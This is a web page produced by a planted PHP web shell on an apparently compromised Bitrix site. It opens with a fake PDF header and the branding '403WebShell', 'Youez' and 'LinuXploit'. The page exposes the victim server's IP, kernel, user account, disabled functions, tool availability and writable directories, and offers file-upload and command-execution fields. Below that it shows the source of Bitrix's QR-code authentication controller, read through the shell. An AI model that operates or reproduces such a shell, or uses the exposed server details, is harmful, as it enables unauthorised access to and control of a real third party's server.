%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 18.219.123.84
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/main/lib/controller/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/main/lib/controller/qrcodeauth.php
<?php

/**
 * Bitrix Framework
 * @package bitrix
 * @subpackage main
 * @copyright 2001-2021 Bitrix
 */
namespace Bitrix\Main\Controller;

use Bitrix\Main;
use Bitrix\Main\Config;
use Bitrix\Main\Security;
use Bitrix\Main\Localization\Loc;
use Bitrix\Pull;

class QrCodeAuth extends Main\Engine\Controller
{
	public function isAllowed()
	{
		if (Config\Option::get('main', 'allow_qrcode_auth', 'N') !== 'Y')
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_option'), 'ERR_OPTION'));
			return false;
		}

		if (!Main\Loader::includeModule('pull') || !\CPullOptions::GetQueueServerStatus())
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_pull'), 'ERR_PULL'));
			return false;
		}

		return true;
	}

	public function pushTokenAction($siteId, $uniqueId, $channelTag, $redirectUrl = '')
	{
		$this->pushToken($siteId, $uniqueId, $channelTag, $redirectUrl);
	}

	public function authenticateAction($token, bool $remember = false)
	{
		global $USER;

		if ($token == '')
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_request'), "ERR_PARAMS"));
			return null;
		}

		if (!$USER->LoginHitByHash($token, false, true, $remember))
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_auth'), "ERR_AUTH"));
			return null;
		}

		return true;
	}

	/**
	 * Adds a token and sends a message to p&p.
	 * @param $siteId
	 * @param $uniqueId
	 * @param string $channelTag
	 * @param string $redirectUrl
	 * @param null $currentUrl
	 * @return bool|null
	 * @throws Main\LoaderException
	 */
	public function pushToken($siteId, $uniqueId, $channelTag, $redirectUrl = '', $currentUrl = null)
	{
		if ($siteId == '' || $uniqueId == '' || $channelTag == '')
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_request'), 'ERR_PARAMS'));
			return null;
		}

		$event = new \Bitrix\Main\Event(
			'main',
			'OnPushQrCodeAuthToken',
			[
				'siteId' => $siteId,
				'uniqueId' => $uniqueId,
				'channelTag' => $channelTag,
				'redirectUrl' => $redirectUrl,
			]
		);
		$event->send();
		/** @var \Bitrix\Main\EventResult $eventResult */
		foreach ($event->getResults() as $eventResult)
		{
			if ($eventResult->getType() === \Bitrix\Main\EventResult::ERROR)
			{
				$error = $eventResult->getParameters()['error'] ?? null;
				if ($error instanceof Main\Error)
				{
					$this->addError($error);
				}
				if (is_string($error) && $error !== '')
				{
					$this->addError(new Main\Error($error, 'ERR_FROM_EVENT'));
				}

				return null;
			}

			return true;
		}

		if ($uniqueId !== static::getUniqueId())
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_unique_id'), 'ERR_UNIQUE_ID'));
			return null;
		}

		if (!$this->isAllowed())
		{
			return null;
		}

		$channel = Pull\Model\Channel::createWithTag($channelTag);

		$url = $currentUrl ?? Main\Context::getCurrent()->getRequest()->getRequestedPage();

		$token = \CUser::GetHitAuthHash($url, false, $siteId);
		if ($token === false)
		{
			$token = \CUser::AddHitAuthHash($url, false, $siteId);
		}

		Pull\Event::add(
			[$channel],
			[
				'module_id' => 'main',
				'command' => 'qrAuthorize',
				'expiry' => 60,
				'params' => [
					'token' => $token,
					'redirectUrl' => $redirectUrl,
				],
			]
		);

		return true;
	}

	public static function getUniqueId()
	{
		$uniqid = Config\Option::get('main', '~public_uniq_id', '');

		if ($uniqid == '')
		{
			$uniqid = Security\Random::getString(16, true);
			Config\Option::set('main', '~public_uniq_id', $uniqid);
		}

		return $uniqid;
	}

	public function configureActions()
	{
		return [
			'authenticate' => [
				'-prefilters' => [
					Main\Engine\ActionFilter\Authentication::class,
				],
			],
		];
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit